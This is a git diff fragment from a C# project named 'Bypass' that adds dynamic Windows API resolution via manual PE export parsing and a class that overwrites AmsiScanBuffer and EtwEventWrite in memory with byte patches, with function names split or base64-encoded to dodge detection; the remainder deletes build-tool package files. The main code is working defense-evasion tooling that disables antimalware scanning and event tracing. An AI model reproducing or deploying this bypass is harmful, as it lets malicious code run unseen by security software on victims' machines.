+ CantRecoverWithHandleOpen = 0xc0190031,
+ RmDisconnected = 0xc0190032,
+ EnlistmentNotSuperior = 0xc0190033,
+ RecoveryNotNeeded = 0xc0190034,
+ RmAlreadyStarted = 0xc0190035,
+ FileIdentityNotPersistent = 0xc0190036,
+ CantBreakTransactionalDependency = 0xc0190037,
+ CantCrossRmBoundary = 0xc0190038,
+ TxfDirNotEmpty = 0xc0190039,
+ IndoubtTransactionsExist = 0xc019003a,
+ TmVolatile = 0xc019003b,
+ RollbackTimerExpired = 0xc019003c,
+ TxfAttributeCorrupt = 0xc019003d,
+ EfsNotAllowedInTransaction = 0xc019003e,
+ TransactionalOpenNotAllowed = 0xc019003f,
+ TransactedMappingUnsupportedRemote = 0xc0190040,
+ TxfMetadataAlreadyPresent = 0xc0190041,
+ TransactionScopeCallbacksNotSet = 0xc0190042,
+ TransactionRequiredPromotion = 0xc0190043,
+ CannotExecuteFileInTransaction = 0xc0190044,
+ TransactionsNotFrozen = 0xc0190045,
+
+ MaximumNtStatus = 0xffffffff
}
- private static void pa(byte[] patch)
+ // Delegate NtProtectVirtualMemory
+ public class Delegates
+ {
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate UInt32 NtProtectVirtualMemory(
+ IntPtr ProcessHandle,
+ ref IntPtr BaseAddress,
+ ref IntPtr RegionSize,
+ UInt32 NewProtect,
+ ref UInt32 OldProtect);
+ }
+
+ private static IntPtr GetLibraryAddress(string DLLName, string FunctionName)
+ {
+ IntPtr hModule = GetLoadedModuleAddress(DLLName);
+ if (hModule == IntPtr.Zero)
+ {
+ throw new DllNotFoundException(DLLName + ", Dll was not found or not loaded.");
+ }
+ IntPtr lastOutput = GetExportAddress(hModule, FunctionName);
+ return lastOutput;
+ }
+
+ private static IntPtr GetLoadedModuleAddress(string DLLName)
+ {
+ Process CurrentProcess = Process.GetCurrentProcess();
+ foreach (ProcessModule Module in CurrentProcess.Modules)
+ {
+ if (string.Compare(Module.ModuleName, DLLName, true) == 0)
+ {
+ IntPtr ModuleBasePointer = Module.BaseAddress;
+ return ModuleBasePointer;
+ }
+ }
+ return IntPtr.Zero;
+ }
+
+ private static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName)
+ {
+ IntPtr FunctionPtr = IntPtr.Zero;
+ try
+ {
+ // Traverse the PE header in memory
+ Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
+ Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
+ Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
+ Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
+ Int64 pExport = 0;
+ if (Magic == 0x010b)
+ {
+ pExport = OptHeader + 0x60;
+ }
+ else
+ {
+ pExport = OptHeader + 0x70;
+ }
+
+ // Read -> IMAGE_EXPORT_DIRECTORY
+ Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
+ Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
+ Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
+ Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
+ Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
+ Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
+ Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
+
+ // Loop the array of export name RVA's
+ for (int i = 0; i < NumberOfNames; i++)
+ {
+ string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4))));
+ if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase))
+ {
+ Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
+ Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
+ FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
+ break;
+ }
+ }
+ }
+ catch
+ {
+ // Catch parser failure
+ throw new InvalidOperationException("Failed to parse module exports.");
+ }
+
+ if (FunctionPtr == IntPtr.Zero)
+ {
+ // Export not found
+ throw new MissingMethodException(ExportName + ", export not found.");
+ }
+ return FunctionPtr;
+ }
+
+ public static object DynamicAPIInvoke(string DLLName, string FunctionName, Type FunctionDelegateType, ref object[] Parameters)
+ {
+ IntPtr pFunction = GetLibraryAddress(DLLName, FunctionName);
+ if (pFunction == IntPtr.Zero)
+ {
+ throw new InvalidOperationException("Could not get the handle for the function.");
+ }
+ return DynamicFunctionInvoke(pFunction, FunctionDelegateType, ref Parameters);
+ }
+
+ private static object DynamicFunctionInvoke(IntPtr FunctionPointer, Type FunctionDelegateType, ref object[] Parameters)
+ {
+ Delegate funcDelegate = Marshal.GetDelegateForFunctionPointer(FunctionPointer, FunctionDelegateType);
+ return funcDelegate.DynamicInvoke(Parameters);
+ }
+
+ public static bool NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect)
+ {
+ // Craft an array for the arguments
+ OldProtect = 0;
+ object[] funcargs = { ProcessHandle, BaseAddress, RegionSize, NewProtect, OldProtect };
+
+ NTSTATUS retValue = (NTSTATUS)DynamicAPIInvoke(@"ntdll.dll", @"NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref funcargs);
+ if (retValue != NTSTATUS.Success)
+ {
+ return false;
+ }
+
+ OldProtect = (UInt32)funcargs[4];
+ return true;
+ }
+ }
+ public class A
+ {
+
+ static byte[] x64_etw_patch = new byte[] { 0x48, 0x33, 0xC0, 0xC3 };
+ static byte[] x86_etw_patch = new byte[] { 0x33, 0xc0, 0xc2, 0x14, 0x00 };
+ static byte[] x64_am_si_patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
+ static byte[] x86_am_si_patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
+
+ // Thx D/Invoke!
+ private static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName)
+ {
+ IntPtr FunctionPtr = IntPtr.Zero;
+ try
+ {
+ // Traverse the PE header in memory
+ Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
+ Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
+ Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
+ Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
+ Int64 pExport = 0;
+ if (Magic == 0x010b)
+ {
+ pExport = OptHeader + 0x60;
+ }
+ else
+ {
+ pExport = OptHeader + 0x70;
+ }
+
+ // Read -> IMAGE_EXPORT_DIRECTORY
+ Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
+ Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
+ Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
+ Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
+ Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
+ Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
+ Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
+
+ // Loop the array of export name RVA's
+ for (int i = 0; i < NumberOfNames; i++)
+ {
+ string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4))));
+ if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase))
+ {
+ Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
+ Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
+ FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
+ break;
+ }
+ }
+ }
+ catch
+ {
+ // Catch parser failure
+ throw new InvalidOperationException("Failed to parse module exports.");
+ }
+
+ if (FunctionPtr == IntPtr.Zero)
+ {
+ // Export not found
+ throw new MissingMethodException(ExportName + " not found.");
+ }
+ return FunctionPtr;
+ }
+
+ private static string decode(string b64encoded)
+ {
+ return System.Text.ASCIIEncoding.ASCII.GetString(System.Convert.FromBase64String(b64encoded));
+ }
+
+ private static void PatchMem(byte[] patch, string library, string function)
{
try
{
- string liba = Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw="));
- var lib = Win32.LDLibraryA(ref liba);//Amsi.dll
- string addra = Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI="));
- var addr = Win32.GetProcAddress(lib, ref addra);//AmsiScanBuffer
-
- uint oldProtect;
- Win32.VirtualAllocEx(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);
-
- Marshal.Copy(patch, 0, addr, patch.Length);
+ IntPtr CurrentProcessHandle = new IntPtr(-1); // pseudo-handle for current process handle
+ IntPtr libPtr = (Process.GetCurrentProcess().Modules.Cast().Where(x => library.Equals(Path.GetFileName(x.FileName), StringComparison.OrdinalIgnoreCase)).FirstOrDefault().BaseAddress);
+ IntPtr funcPtr = GetExportAddress(libPtr, function);
+ IntPtr patchLength = new IntPtr(patch.Length);
+ UInt32 oldProtect = 0;
+ DInvokeCore.NtProtectVirtualMemory(CurrentProcessHandle, ref funcPtr, ref patchLength, 0x40, ref oldProtect);
+ Marshal.Copy(patch, 0, funcPtr, patch.Length);
}
catch (Exception e)
{
- Console.WriteLine(" [x] {0}", e.Message);
- Console.WriteLine(" [x] {0}", e.InnerException);
+ Console.WriteLine(" [!] {0}", e.Message);
+ Console.WriteLine(" [!] {0}", e.InnerException);
}
}
- private static bool i64()
+ private static void Patcham_si(byte[] patch)
{
- bool i64 = true;
+ string dll = decode("YW1zaS5kbGw=");
+ foreach (ProcessModule CurrentModule in (Process.GetCurrentProcess().Modules))
+ {
+ if (CurrentModule.ModuleName == dll)
+ {
+ PatchMem(patch, dll, ("Am" + "si" + "Sc" + "an" + "Bu" + "ff" + "er"));
+ }
+ }
+ }
+ private static void PatchETW(byte[] Patch)
+ {
+ PatchMem(Patch, ("n" + "t" + "d" + "l" + "l" + "." + "d" + "l" + "l"), ("Et" + "wE" + "ve" + "nt" + "Wr" + "it" + "e"));
+ }
+
+ public static void B()
+ {
+ bool isit64bit;
if (IntPtr.Size == 4)
- i64 = false;
-
- return i64;
+ {
+ isit64bit = false;
+ }
+ else
+ {
+ isit64bit = true;
+ }
+ if (isit64bit)
+ {
+ Patcham_si(x64_am_si_patch);
+ PatchETW(x64_etw_patch);
+ }
+ else
+ {
+ Patcham_si(x86_am_si_patch);
+ PatchETW(x86_etw_patch);
+ }
}
}
- class Win32
- {
- //[DllImport("kernel32")]
- //public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
-
- //[DllImport("kernel32")]
- //public static extern IntPtr LDLibrary(string name);
-
-
- public static readonly DelegateVirtualProtect VirtualAllocEx = LDApi("kernel32", Encoding.Default.GetString(Convert.FromBase64String("VmlydHVhbFByb3RlY3Q=")));//VirtualProtect
-
- public delegate int DelegateVirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
-
- #region CreateAPI
- [DllImport("kernel32", SetLastError = true)]
- public static extern IntPtr LDLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
-
- [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
- public static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
- public static CreateApi LDApi(string name, string method)
- {
- return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LDLibraryA(ref name), ref method), typeof(CreateApi));
- }
- #endregion
- }
}
diff --git a/Bypass/Properties/AssemblyInfo.cs b/Bypass/Properties/AssemblyInfo.cs
index f651fb2..6945c82 100644
--- a/Bypass/Properties/AssemblyInfo.cs
+++ b/Bypass/Properties/AssemblyInfo.cs
@@ -9,7 +9,7 @@ using System.Runtime.InteropServices;
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
-[assembly: AssemblyProduct("")]
+[assembly: AssemblyProduct("Program")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
@@ -20,7 +20,7 @@ using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
// 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID
-[assembly: Guid("6f5245be-37ec-4cfb-8f6f-03ed38215d0a")]
+[assembly: Guid("4541d820-539a-4e4e-a37b-a20ae0b56376")]
// 程序集的版本信息由下列四个值组成:
//
diff --git a/Bypass/app.manifest b/Bypass/app.manifest
index c7cd7fe..e13f4ab 100644
--- a/Bypass/app.manifest
+++ b/Bypass/app.manifest
@@ -1,10 +1,10 @@
-
-
-
-
-
-
-
-
-
+
+
+
+
-
-
-
-
-
+
+
-
-
+
+
-
-
+
+
-
-
+
+
-
-
+
+
-
-
+
+
-
-
-
- true
- true
-
-
+
+
+ true
+ true
+
+
-
-
+
-
-
- $(MSBuildProjectDirectory)\$(MSBuildProjectName).ILMerge.props
- $(MSBuildProjectDirectory)\ILMerge.props
-
-
-
-
\ No newline at end of file
diff --git a/packages/MSBuild.ILMerge.Task.1.1.3/build/MSBuild.ILMerge.Task.targets b/packages/MSBuild.ILMerge.Task.1.1.3/build/MSBuild.ILMerge.Task.targets
deleted file mode 100644
index 29e52dc..0000000
--- a/packages/MSBuild.ILMerge.Task.1.1.3/build/MSBuild.ILMerge.Task.targets
+++ /dev/null
@@ -1,116 +0,0 @@
-
-
-
-
- $(SolutionDir)packages
- $(MSBuildProjectDirectory)\ILMergeOrder.txt
- $(AssemblyOriginatorKeyFile)
-
-
-
- false
- false
- false
- true
- false
- 512
- false
-
- false
- true
- true
-
- false
- 40
-
-
- $(MSBuildThisFileDirectory)..\tools\
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- @(IntermediateAssembly->'%(FullPath)');@(MergedAssemblies->'%(FullPath)');@(MergedDependencies->'%(FullPath)')
-
-
- @(IntermediateAssembly->'%(FullPath)');@(MergedAssemblies->'%(FullPath)')
-
-
-
-
-
- @(UnmergedAssemblies->'%(FullPath)')
- $(TargetPath)
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/packages/MSBuild.ILMerge.Task.1.1.3/content/ILMerge.props b/packages/MSBuild.ILMerge.Task.1.1.3/content/ILMerge.props
deleted file mode 100644
index aaadb12..0000000
--- a/packages/MSBuild.ILMerge.Task.1.1.3/content/ILMerge.props
+++ /dev/null
@@ -1,67 +0,0 @@
-
-
-
-
-
-
-
-
-
-
- true
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/packages/MSBuild.ILMerge.Task.1.1.3/content/ILMergeOrder.txt b/packages/MSBuild.ILMerge.Task.1.1.3/content/ILMergeOrder.txt
deleted file mode 100644
index 3fda7f5..0000000
--- a/packages/MSBuild.ILMerge.Task.1.1.3/content/ILMergeOrder.txt
+++ /dev/null
@@ -1,4 +0,0 @@
-# this file contains the partial list of the merged assemblies in the merge order
-# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
-# and finetune merge order to your satisfaction
-
diff --git a/packages/MSBuild.ILMerge.Task.1.1.3/tools/MSBuild.ILMerge.Task.dll b/packages/MSBuild.ILMerge.Task.1.1.3/tools/MSBuild.ILMerge.Task.dll
deleted file mode 100644
index ca28b04..0000000
Binary files a/packages/MSBuild.ILMerge.Task.1.1.3/tools/MSBuild.ILMerge.Task.dll and /dev/null differ